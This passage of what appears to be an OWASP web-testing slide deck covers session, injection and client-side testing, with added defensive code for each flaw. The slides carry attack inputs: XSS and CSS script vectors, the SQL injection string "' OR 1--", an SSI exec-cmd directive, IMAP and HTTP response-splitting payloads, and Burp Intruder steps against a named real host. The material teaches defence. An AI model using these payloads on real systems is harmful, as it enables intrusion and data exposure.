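import hmac
import secrets


class CsrfProtector:
    def __init__(self):
        self._tokens = {}                       # session_id -> token

    def issue_token(self, session_id):
        """Called when rendering a form; embed the result in a hidden field."""
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def verify_request(self, session_id, method, form):
        """True for safe methods, or when the form carries the session's token."""
        if method.upper() in ("GET", "HEAD", "OPTIONS"):
            return True                         # safe methods must not change state anyway
        expected = self._tokens.get(session_id)
        supplied = form.get("csrf_token", "")
        if expected is None or not supplied:
            return False
        return hmac.compare_digest(expected, supplied)   # constant-time comparison


def demo():
    csrf = CsrfProtector()
    token = csrf.issue_token("sess-victim")
    legit = csrf.verify_request("sess-victim", "POST", {"to": "acct-9", "csrf_token": token})
    # Cross-site form post: the browser attaches the victim's session cookie, but the
    # attacker's page cannot read the token, so the request arrives without it.
    forged = csrf.verify_request("sess-victim", "POST", {"to": "acct-9"})
    guessed = csrf.verify_request("sess-victim", "POST", {"to": "acct-9", "csrf_token": "x" * 43})
    return legit, forged, guessed
```

The test for this control is the same request replayed from a page on another origin: with the token present and bound to the session, the replay must fail even though the session cookie is sent.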
  • 83.
    Testing for logout user interface
    Testing for server-side session termination
    Testing for session timeout
    Testing session clean at client side
    In this phase, we check that the application automatically logs out a user when that user has been idle for a certain amount of time, ensuring that it is not possible to “reuse” the same session and that no sensitive data remains stored in the browser cache.
  • 84.
    This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers, so that the session variable is set in one context and then used in another.
  • 85.
    1. Testing for Reflected Cross Site Scripting
    2. Testing for Stored Cross Site Scripting
    3. Testing for HTTP Verb Tampering
    4. Testing for HTTP Parameter pollution
    5. Testing for SQL Injection
    5.1 Oracle Testing
    5.2 MySQL Testing
    5.3 SQL Server Testing
    5.4 Testing PostgreSQL
    5.5 MS Access Testing
    5.6 Testing for NoSQL injection
    ………..
  • 86.
    6. Testing for LDAP Injection
    7. Testing for ORM Injection
    8. Testing for XML Injection
    9. Testing for SSI Injection
    10. Testing for XPath Injection
    11. IMAP/SMTP Injection
    12. Testing for Code Injection
    12.1 Testing for Local File Inclusion
    12.2 Testing for Remote File Inclusion
    13. Testing for Command Injection
    14. Testing for Buffer overflow
    14.1 Testing for Heap overflow
    14.2 Testing for Stack overflow
    14.3 Testing for Format string
    15. Testing for incubated vulnerabilities
    16. Testing for HTTP Splitting/Smuggling
  • 87.
    Reflected Cross-site Scripting (XSS) occurs when an attacker injects browser-executable code within a single HTTP response.
    http://example.com/index.php?user=<script>alert(123)</script>
    Bypass XSS filters: Page #224
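The URL above reflects the user parameter into the page. As an added example (not the deck's code, and index.php itself is not shown on the page), the Python below reproduces that vulnerable pattern in a stand-in handler and places the fixed version next to it, where html.escape applies contextual output encoding so the same parameter is rendered as text. render_unsafe, render_safe, user_param and contains_script_tag are names chosen for this example.

```python
"""Reflected XSS: the vulnerable handler beside the encoded one (added example)."""
import html
from urllib.parse import parse_qs, urlsplit

PAYLOAD_URL = "http://example.com/index.php?user=<script>alert(123)</script>"  # from the slide


def user_param(url):
    """Extract the 'user' query parameter as the server would receive it."""
    query = parse_qs(urlsplit(url).query)
    return query.get("user", [""])[0]


def render_unsafe(user):
    # Vulnerable: attacker-controlled text is concatenated into markup.
    return "<p>Welcome, " + user + "</p>"


def render_safe(user):
    # Fixed for an HTML text context: <, >, &, ' and " become entities, so the
    # browser shows the payload as text instead of executing it.
    return "<p>Welcome, " + html.escape(user, quote=True) + "</p>"


def contains_script_tag(markup):
    """Crude check used by the demo: does an executable tag survive in the output?"""
    return "<script" in markup.lower()


def demo():
    user = user_param(PAYLOAD_URL)
    return (contains_script_tag(render_unsafe(user)),
            contains_script_tag(render_safe(user)),
            render_safe(user))
```

The escaping shown is right for HTML body text only; a value placed inside a JavaScript string, a URL attribute or a CSS block needs the encoding of that context, which is why the filter-bypass material referenced above exists.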
  • 88.
  • 89.
  • 90.
    Step 1) Navigate to http://app.utu.ac.in/, intercept that request using Burp Suite and send it to Intruder.
  • 91.
    Step 2) Go to the "Positions" tab, select "GET" and click the "Add" button
  • 92.
    Step 3) Go to the "Payloads" tab and select "HTTP Verbs" in the Payload Options category
  • 93.
    Step 4) Open the "Intruder" menu and select the "Start attack" option
  • 94.
  • 95.
    Query: http://example.com/?color=red&color=blue
    Web Application Server Backend                Parsing Result              Example
    ASP.NET / IIS                                 concatenated with a comma   color=red,blue
    ASP / IIS                                     concatenated with a comma   color=red,blue
    PHP / Apache                                  Last occurrence only        color=blue
    PHP / Zeus                                    Last occurrence only        color=blue
    JSP, Servlet / Apache Tomcat                  First occurrence only       color=red
    JSP, Servlet / Oracle Application Server 10g  First occurrence only       color=red
  • 96.
    Authentication bypass
    POST /add-authors.do HTTP/1.1
    security_token=attackertoken&blogID=attackerblogidvalue&blogID=victimblogidvalue&authorsList=tester@gmail.com(attacker email)&ok=Invite
    Web Application Server Backend                Parsing Result                      Example
    JSP, Servlet / Jetty                          First occurrence only               color=red
    IBM Lotus Domino                              Last occurrence only                color=blue
    IBM HTTP Server                               First occurrence only               color=red
    mod_perl, libapreq2 / Apache                  First occurrence only               color=red
    Perl CGI / Apache                             First occurrence only               color=red
    mod_wsgi (Python) / Apache                    First occurrence only               color=red
    Python / Zope                                 All occurrences in List data type   color=['red','blue']
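The two tables show that the same query string means different things to different backends, which is what the duplicated blogID in the add-authors request exploits. As an added example (not code from the deck), the Python below reproduces the three parsing behaviours on the slide's URL and then shows the defensive rule: refuse any request in which a parameter name occurs more than once, so no backend's preference decides which value wins. The function names are constructed; the sample query and body are taken from the slides, with the "(attacker email)" annotation removed from the body.

```python
"""HTTP Parameter Pollution: backend parsing differences and a duplicate check (added example)."""
from urllib.parse import parse_qsl, urlsplit

SLIDE_URL = "http://example.com/?color=red&color=blue"
SLIDE_QUERY = urlsplit(SLIDE_URL).query
ADD_AUTHORS_BODY = ("security_token=attackertoken&blogID=attackerblogidvalue"
                    "&blogID=victimblogidvalue&authorsList=tester@gmail.com&ok=Invite")


def pairs(query):
    """Ordered (name, value) pairs with duplicates preserved."""
    return parse_qsl(query, keep_blank_values=True)


def first_occurrence(query):        # Tomcat, Jetty, IBM HTTP Server, mod_perl, mod_wsgi
    result = {}
    for name, value in pairs(query):
        result.setdefault(name, value)
    return result


def last_occurrence(query):         # PHP/Apache, PHP/Zeus, Lotus Domino
    return dict(pairs(query))


def all_occurrences(query):         # Zope (list); ASP/IIS joins the same list with commas
    result = {}
    for name, value in pairs(query):
        result.setdefault(name, []).append(value)
    return result


def find_duplicates(query):
    """Parameter names that appear more than once, in order of first repeat."""
    seen, dupes = set(), []
    for name, _ in pairs(query):
        if name in seen and name not in dupes:
            dupes.append(name)
        seen.add(name)
    return dupes


def strict_params(query):
    """Single-valued view that raises instead of silently picking one occurrence."""
    dupes = find_duplicates(query)
    if dupes:
        raise ValueError("duplicated parameter(s): " + ", ".join(dupes))
    return dict(pairs(query))


if __name__ == "__main__":
    print(first_occurrence(SLIDE_QUERY), last_occurrence(SLIDE_QUERY), all_occurrences(SLIDE_QUERY))
    print("duplicates in add-authors body:", find_duplicates(ADD_AUTHORS_BODY))
```

Applied to the add-authors body, the duplicate check flags blogID before either value is used, which removes the ambiguity regardless of which of the table's behaviours the framework has.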
  • 97.
  • 98.
  • 99.
  • 100.
  • 101.
  • 102.
  • 103.
    LDAP injection testing is similar to SQL Injection testing. The differences are that we use the LDAP protocol instead of SQL and that the target is an LDAP server instead of a SQL server.
    "(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))";
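The filter above is built by concatenation, so characters with meaning in filter syntax flow straight into it. The fix on the application side is to escape assertion values as RFC 4515 requires before they are placed in the filter. The Python below is an added example, not code from the deck: escape_filter_value implements that escaping, build_filter_unsafe mirrors the slide's concatenation and build_filter_safe is the corrected version; the malformed sample values are constructed.

```python
"""LDAP filter assertion-value escaping per RFC 4515 (added example)."""

# Characters that change the meaning of a search filter and their escaped forms.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value):
    """Escape a value for use inside an LDAP search filter (single pass, so a
    backslash is encoded once and never re-escaped)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(user, password_assertion):
    # Vulnerable: same shape as the slide's string concatenation.
    return "(&(uid=" + user + ")(userPassword=" + password_assertion + "))"


def build_filter_safe(user, password_assertion):
    # Fixed: both values are escaped, so they can only ever be compared literally.
    return ("(&(uid=" + escape_filter_value(user)
            + ")(userPassword=" + escape_filter_value(password_assertion) + "))")


def count_assertions(ldap_filter):
    """Number of '(' in the filter; injected parentheses add assertions."""
    return ldap_filter.count("(")


if __name__ == "__main__":
    odd_name = "a)(b"           # constructed malformed input
    print(build_filter_unsafe(odd_name, "p"))
    print(build_filter_safe(odd_name, "p"))
```

A useful check while testing is to compare the number of assertions in the filter the server logs with the number the code intended: the escaped build keeps it constant whatever the input contains.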
  • 104.
    An ORM is an Object Relational Mapping tool. It is used to expedite object oriented development within the data access layer of software applications, including web applications. Testing for ORM Injection vulnerabilities is identical to SQL Injection testing (see Testing for SQL Injection).
    Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'"
    Simply sending "' OR 1--" in the form where the order date can be entered can yield positive results.
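The Ruby finder above interpolates order_date into the condition string, so the ORM executes whatever SQL the parameter produces. As an added example (not the deck's code), the Python below reproduces that behaviour against an in-memory SQLite table and puts the parameterised query next to it; the slide's "' OR 1--" input is run through both so the difference is visible in the rows returned. The table layout and function names are constructed for this example.

```python
"""String-built query versus bound parameters (added example)."""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE orders (id INTEGER, customer_id INTEGER, order_date TEXT)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?)", [
        (1, 123, "2024-01-10"),
        (2, 123, "2024-02-15"),
        (3, 456, "2024-01-10"),   # belongs to another customer
    ])
    return conn


def find_orders_unsafe(conn, customer_id, order_date):
    # Vulnerable: same shape as  "customer_id = 123 AND order_date = '#{@params['order_date']}'"
    sql = ("SELECT id FROM orders WHERE customer_id = %d AND order_date = '%s'"
           % (customer_id, order_date))
    return sorted(row[0] for row in conn.execute(sql))


def find_orders_safe(conn, customer_id, order_date):
    # Fixed: the value is bound by the driver and never parsed as SQL.
    # ORM finders accept the same form, e.g. find_all(["... = ?", value]).
    sql = "SELECT id FROM orders WHERE customer_id = ? AND order_date = ?"
    return sorted(row[0] for row in conn.execute(sql, (customer_id, order_date)))


def demo():
    conn = make_db()
    payload = "' OR 1--"                      # the input from the slide
    return (
        find_orders_unsafe(conn, 123, "2024-01-10"),   # normal use: one row
        find_orders_unsafe(conn, 123, payload),        # condition collapses to OR 1: every row
        find_orders_safe(conn, 123, payload),          # no order has that literal date
    )
```

The "positive result" the slide refers to is the second element of demo(): the customer_id restriction is defeated and another customer's order appears in the list.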
  • 105.
  • 106.
    Web servers usually give developers the ability to add small pieces of dynamic code inside static HTML pages, without having to deal with full-fledged server-side or client-side languages. This feature is provided by Server-Side Includes (SSI), and abusing it is SSI Injection.
  • 107.
    .shtml file
    Putting an SSI directive into a static HTML document is as easy as writing a piece of code like the following:
    <!--#echo var="DATE_LOCAL" -->
    to print out the current time.
    <!--#include virtual="/cgi-bin/counter.pl" -->
    to include the output of a CGI script.
    <!--#include virtual="/footer.html" -->
    to include the content of a file or list files in a directory.
    <!--#exec cmd="ls" -->
    to include the output of a system command.
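The #exec directive in the last line is what turns an injected SSI into command execution. As an added example (not from the deck), this Apache httpd fragment shows the permissive Options setting beside the IncludesNOEXEC variant, which keeps #echo and #include of static files working while refusing #exec cmd and #exec cgi; the directory path is a placeholder.

```apache
# Weak: Includes enables every SSI directive, including <!--#exec cmd="..." -->,
# in any .shtml file under this directory.
<Directory "/var/www/html">
    Options +Includes
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>

# Corrected: IncludesNOEXEC still processes #echo and #include of static
# files, but #exec cmd and #exec cgi are disabled, so a directive that reaches
# a page through user input can no longer run a system command.
<Directory "/var/www/html">
    Options +IncludesNOEXEC
    AddType text/html .shtml
    AddOutputFilter INCLUDES .shtml
</Directory>
```

Where SSI is not needed at all, leaving Includes out of Options entirely is the stronger setting; IncludesNOEXEC is for the case where a site genuinely relies on #include for shared fragments.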
  • 108.
  • 109.
    FETCH 4791 BODY[HEADER]
    In this scenario, the IMAP injection structure would be:
    http://<webmail>/read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791
    Which would generate the following commands:
    ???? FETCH 4791 BODY[HEADER]
    V100 CAPABILITY
    V101 FETCH 4791 BODY[HEADER]
    where:
    Header = 4791 BODY[HEADER]
    Body = %0d%0aV100 CAPABILITY%0d%0a
    Footer = V101 FETCH 4791
    Result Expected: Arbitrary IMAP/SMTP command injection
  • 110.
  • 111.
  • 112.
    Testing for Local File Inclusion
  • 113.
  • 114.
    Testing for Remote File Inclusion
    http://youarehack.com
  • 115.
  • 116.
  • 117.
  • 118.
    advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>
    The resulting answer from the vulnerable application will therefore be the following:
    HTTP/1.1 302 Moved Temporarily
    Date: Sun, 03 Dec 2005 16:22:19 GMT
    Location: http://victim.com/main.jsp?interface=advanced
    Content-Length: 0

    HTTP/1.1 200 OK
    Content-Type: text/html
    Content-Length: 35

    <html>Sorry,%20System%20Down</html>
    <other data>
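The IMAP injection on slide 109 and the HTTP splitting case here share one root cause: %0d%0a survives URL decoding and ends the current line of the protocol the value is copied into. The Python below is an added example (not code from the deck) of the input validation that stops both: the parameter is decoded the way the server decodes it, then refused if it is not a single line, and, for the message id, if it is not an integer. InjectionAttempt, imap_fetch_command, redirect_location and the sample parameters are constructed for the example; the injected samples are shortened versions of the two slides' payloads.

```python
"""Rejecting CR/LF in values copied into an IMAP command or an HTTP header (added example)."""
from urllib.parse import unquote


class InjectionAttempt(ValueError):
    pass


def decoded(param):
    """URL-decode once, as the server's parameter parser does."""
    return unquote(param)


def require_single_line(value, what):
    if "\r" in value or "\n" in value:
        raise InjectionAttempt("%s contains CR/LF" % what)
    return value


def imap_fetch_command(tag, message_id_param):
    """Build 'TAG FETCH <id> BODY[HEADER]' from an integer message id only."""
    value = decoded(message_id_param)
    if not value.isdigit():                       # rejects "4791 BODY[HEADER]\r\nV100 ..."
        raise InjectionAttempt("message_id is not an integer")
    return "%s FETCH %s BODY[HEADER]" % (tag, value)


def redirect_location(base, interface_param):
    """Build a Location header whose value cannot start a second response."""
    value = require_single_line(decoded(interface_param), "interface")
    return "Location: %s?interface=%s" % (base, value)


# Constructed inputs modelled on the two slides.
IMAP_OK = "4791"
IMAP_BAD = "4791%20BODY%5BHEADER%5D%0d%0aV100%20CAPABILITY"
HTTP_OK = "advanced"
HTTP_BAD = "advanced%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK"


def demo():
    outcome = {}
    for label, call in (
        ("imap_ok", lambda: imap_fetch_command("A001", IMAP_OK)),
        ("imap_bad", lambda: imap_fetch_command("A001", IMAP_BAD)),
        ("http_ok", lambda: redirect_location("http://victim.com/main.jsp", HTTP_OK)),
        ("http_bad", lambda: redirect_location("http://victim.com/main.jsp", HTTP_BAD)),
    ):
        try:
            outcome[label] = call()
        except InjectionAttempt as exc:
            outcome[label] = "rejected: " + str(exc)
    return outcome
```

Most current web frameworks refuse CR/LF in header values themselves, but the IMAP side has no such safety net, so the integer check before building the FETCH command is the one to insist on in review.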
  • 119.
    1. Analysis of Error Codes
    2. Analysis of Stack Traces
  • 120.
  • 121.
  • 122.
    1. Testing for Weak SSL/TLS Ciphers, Insufficient Transport Layer Protection
    2. Testing for Padding Oracle
    3. Testing for Sensitive information sent via unencrypted channels
  • 123.
  • 124.
  • 125.
  • 126.
  • 127.
    1. Test time synchronisation
    2. Test user-viewable log of authentication events
  • 128.
    Date: Tue, 15 Oct 2013 14:11:09 GMT
    Server: Apache
    X-Frame-Options: Deny
    X-XSS-Protection: 1; mode=block
    X-Content-Type-Options: nosniff
    Content-Language: en
    Vary: Accept-Encoding,Cookie
    Expires: Wed, 16 Oct 2013 14:11:09 GMT
    Cache-Control: max-age=86400
    Content-Encoding: gzip
    Content-Type: text/html; charset=UTF-8
    200 OK
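The header set above, the HSTS header from slide 45 and the cache-control directives from slide 63 are all checked the same way: parse the raw response headers and compare each against the expected value. The Python below is one added example serving those three slides (not code from the deck): parse_headers and directives do the parsing, audit_headers returns a list of findings, and the two sample responses are constructed, the first from the headers on this slide and the second hardened as slides 45 and 63 recommend. The 180-day HSTS threshold is a constructed policy value.

```python
"""Audit a captured HTTP response for HSTS, cache-control and framing headers (added example)."""

MIN_HSTS_MAX_AGE = 15552000          # 180 days: constructed policy threshold


def parse_headers(raw):
    """'Name: value' lines -> dict keyed by lower-cased name (repeats joined with ', ')."""
    headers = {}
    for line in raw.strip().splitlines():
        if ":" not in line:
            continue                  # status line or blank line
        name, _, value = line.partition(":")
        key = name.strip().lower()
        headers[key] = (headers[key] + ", " if key in headers else "") + value.strip()
    return headers


def directives(value):
    """'max-age=60000; includeSubDomains' -> {'max-age': '60000', 'includesubdomains': ''}"""
    out = {}
    for part in value.replace(";", ",").split(","):
        k, _, v = part.strip().partition("=")
        if k:
            out[k.lower()] = v.strip()
    return out


def audit_headers(raw, sensitive_page=True):
    h = parse_headers(raw)
    findings = []
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("HSTS missing: a first request can still go over plain HTTP")
    else:
        d = directives(hsts)
        if int(d.get("max-age", "0")) < MIN_HSTS_MAX_AGE:
            findings.append("HSTS max-age below policy threshold")
        if "includesubdomains" not in d:
            findings.append("HSTS without includeSubDomains")
    if sensitive_page:
        cc = directives(h.get("cache-control", ""))
        if not ({"no-cache", "no-store"} & set(cc)):
            findings.append("Cache-Control allows caching of a sensitive page")
        if h.get("pragma", "").lower() != "no-cache":
            findings.append("Pragma: no-cache missing (HTTP/1.0 caches)")
    if h.get("x-frame-options", "").lower() not in ("deny", "sameorigin"):
        findings.append("X-Frame-Options missing or permissive (clickjacking)")
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff missing")
    return findings


# Constructed sample 1: the headers shown on this slide (no HSTS, cacheable for a day).
SLIDE_128 = """HTTP/1.1 200 OK
Date: Tue, 15 Oct 2013 14:11:09 GMT
Server: Apache
X-Frame-Options: Deny
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Cache-Control: max-age=86400
Content-Type: text/html; charset=UTF-8
"""

# Constructed sample 2: the same response hardened as slides 45 and 63 recommend.
HARDENED = """HTTP/1.1 200 OK
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: 0
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Content-Type: text/html; charset=UTF-8
"""

if __name__ == "__main__":
    print(audit_headers(SLIDE_128))
    print(audit_headers(HARDENED))
```

Pass sensitive_page=False for static content, where the cache-control findings would be noise; the HSTS and framing checks apply to every response of an HTTPS site.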
  • 129.
  • 130.
    1. Testing for DOM based Cross Site Scripting
    2. Testing for JavaScript Execution
    3. Testing for HTML Injection
    4. Testing for Client Side URL Redirect
    5. Testing for CSS Injection
    6. Testing for Client Side Resource Manipulation
    7. Test Cross Origin Resource Sharing
    8. Testing for Cross Site Flashing
    9. Testing for Clickjacking
    10. Testing WebSockets
    11. Test Web Messaging
    12. Test Local Storage
  • 131.
  • 132.
  • 133.
  • 134.
  • 135.
    www.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])
    www.victim.com/#red;-:expression(alert(URL=1)); (IE7/8)
    Resource Type   Tag/Method                       Sink
    Frame           iframe                           src
    Link            a                                href
    AJAX Request    xhr.open(method, [url], true);   URL
    CSS             link                             href
    Image           img                              src
    Object          object                           data
    Script          script                           src
  • 136.
    HTTP/1.1 200 OK
    Date: Mon, 07 Oct 2013 18:57:53 GMT
    Server: Apache/2.2.22 (Debian)
    X-Powered-By: PHP/5.4.4-14+deb7u3
    Access-Control-Allow-Origin: *
    Content-Length: 4
    Keep-Alive: timeout=15, max=99
    Connection: Keep-Alive
    Content-Type: application/xml

    [Response Body]
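The response above answers every origin with Access-Control-Allow-Origin: *. As an added example (not the deck's code), the Python below shows the server-side rule a reviewer expects instead: echo the request's Origin only when it is on an explicit allowlist, compare the full origin exactly rather than by prefix, add Vary: Origin so a shared cache does not replay one origin's answer to another, and never combine * with credentials. cors_headers, the allowlist and the sample requests are constructed for this example.

```python
"""Origin allowlisting for CORS instead of a wildcard (added example)."""

ALLOWED_ORIGINS = {"https://app.example.com", "https://admin.example.com"}   # constructed


def cors_headers(request_headers, allowed=ALLOWED_ORIGINS, with_credentials=False):
    """Return the CORS response headers for a request, or {} if the origin is not allowed.

    The comparison is exact on the full origin (scheme + host + port). A prefix
    test such as startswith("https://app.example.com") would also accept
    "https://app.example.com.attacker.test".
    """
    origin = request_headers.get("Origin")
    if origin is None or origin not in allowed:
        return {}                                    # no CORS headers: the browser blocks the read
    headers = {
        "Access-Control-Allow-Origin": origin,       # echo the allowed origin, never "*"
        "Vary": "Origin",                            # cache keyed on Origin
    }
    if with_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"   # only ever with a named origin
    return headers


def demo():
    ok = cors_headers({"Origin": "https://app.example.com"})
    lookalike = cors_headers({"Origin": "https://app.example.com.attacker.test"})
    no_origin = cors_headers({"Host": "api.example.com"})
    return ok, lookalike, no_origin
```

When testing CORS, send the request with a made-up Origin and with a lookalike of an allowed one: a correct implementation returns no Access-Control-Allow-Origin header in both cases, and the wildcard shown on the slide should only ever appear on data that is genuinely public.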
  • 137.
  • 138.
  • 139.
  • 140.
  • 141.
  • 142.
    The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP's mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks.
  • 143.
    Net-Square Solutions Private Limited is a niche Information Security Service provider. Net-Square is completely and mainly focused on technology-based areas of information security like application & infrastructure security. Net-Square Solutions was founded by the internationally experienced information security specialist Saumil Shah in the year 2000. Since then Net-Square has conducted many assignments for some of the best organizations in the world, in sectors ranging from Banking & Financial Services to Telecom to Retail to Pharmaceuticals.
  • 144.